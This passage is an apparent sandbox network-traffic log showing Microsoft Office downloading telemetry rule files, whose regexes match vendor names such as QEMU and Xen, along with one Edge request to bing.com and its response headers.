T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.5	49932	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 954b4d19-301e-0052-53d5-3365d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f784596886s2bhC1EWR743w00000005k000000000nb70 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.5	49934	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 16af1629-301e-0033-6dd5-33fa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f78459685m244hC1EWRgp2c00000005eg00000000aa5w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.5	49942	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 2302a2aa-d01e-0017-0cd5-33b035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f7845968j9dchhC1EWRfe7400000005d000000000eda8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.5	49941	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 9a2be61a-a01e-0053-3cd5-338603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f78459685726chC1EWRsnbg00000005h000000000tckz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.5	49943	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 87508d13-a01e-0098-09d5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f784596886s2bhC1EWR743w00000005kg00000000k3nw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.5	49944	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 87508d14-a01e-0098-0ad5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f7845968pf68xhC1EWRr4h800000005y0000000001w57 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.5	49945	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:32 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 7cd11897-e01e-0052-7bd5-33d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230632Z-174f7845968t42glhC1EWRa36w00000005a000000000c6q4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:32 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	49954	23.219.82.80	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	628	OUT	OPTIONS /bnc/notifications/count?app=anaheim&pageId=ntp HTTP/1.1 Host: www.bing.com Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: x-personalbing-csrf,x-personalbing-flights,x-search-clientid,x-search-uilang Origin: https://ntp.msn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:32 UTC	2234	IN	HTTP/1.1 200 OK Content-Length: 0 Access-Control-Allow-Headers: * Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Max-Age: 7200 Cache-Control: private X-EventID: 67328df8fa0a46b9bfef6598a96c21e6 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-QEH9yj6ZGAsnnqISEU3NiTLBBA7fTVSLjZhPm6m+1qs='; base-uri 'self';report-to csp-endpoint Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]} P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Mon, 11 Nov 2024 23:06:32 GMT Connection: close Set-Cookie: MUID=3A1808A9735466D63F6F1D9D7259670C; domain=.bing.com; expires=Sat, 06-Dec-2025 23:06:32 GMT; path=/; secure; SameSite=None Set-Cookie: MUIDB=3A1808A9735466D63F6F1D9D7259670C; expires=Sat, 06-Dec-2025 23:06:32 GMT; path=/; HttpOnly Set-Cookie: _EDGE_S=F=1&SID=235702DC051A6EED261617E804176F9D; domain=.bing.com; path=/; HttpOnly Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Sat, 06-Dec-2025 23:06:32 GMT; path=/; HttpOnly Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Wed, 11-Nov-2026 23:06:32 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Wed, 11-Nov-2026 23:06:32 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUID=V=2&GUID=29B16E5EEE5149F1BC939C17FCA4D37C&dmnchg=1; domain=.bing.com; expires=Wed, 11-Nov-2026 23:06:32 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUSR=DOB=20241111; domain=.bing.com; expires=Wed, 11-Nov-2026 23:06:32 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Wed, 11-Nov-2026 23:06:32 GMT; path=/; secure; SameSite=None Set-Cookie: _SS=SID=235702DC051A6EED261617E804176F9D; domain=.bing.com; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.3652db17.1731366392.1b321f6e

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	49952	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:32 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: c056ec92-701e-001e-03d5-33f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230632Z-174f78459685m244hC1EWRgp2c00000005g0000000004abx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:32 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.5	49953	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:32 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: b85e0199-b01e-0098-60d5-33cead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230632Z-174f7845968nnm4mhC1EWR1rn400000005ng000000001n21 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:32 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	49955	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:32 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 78b03aef-101e-000b-52d5-335e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230632Z-174f7845968cpnpfhC1EWR3afc000000057000000000ck15 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:32 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.5	49956	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:32 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
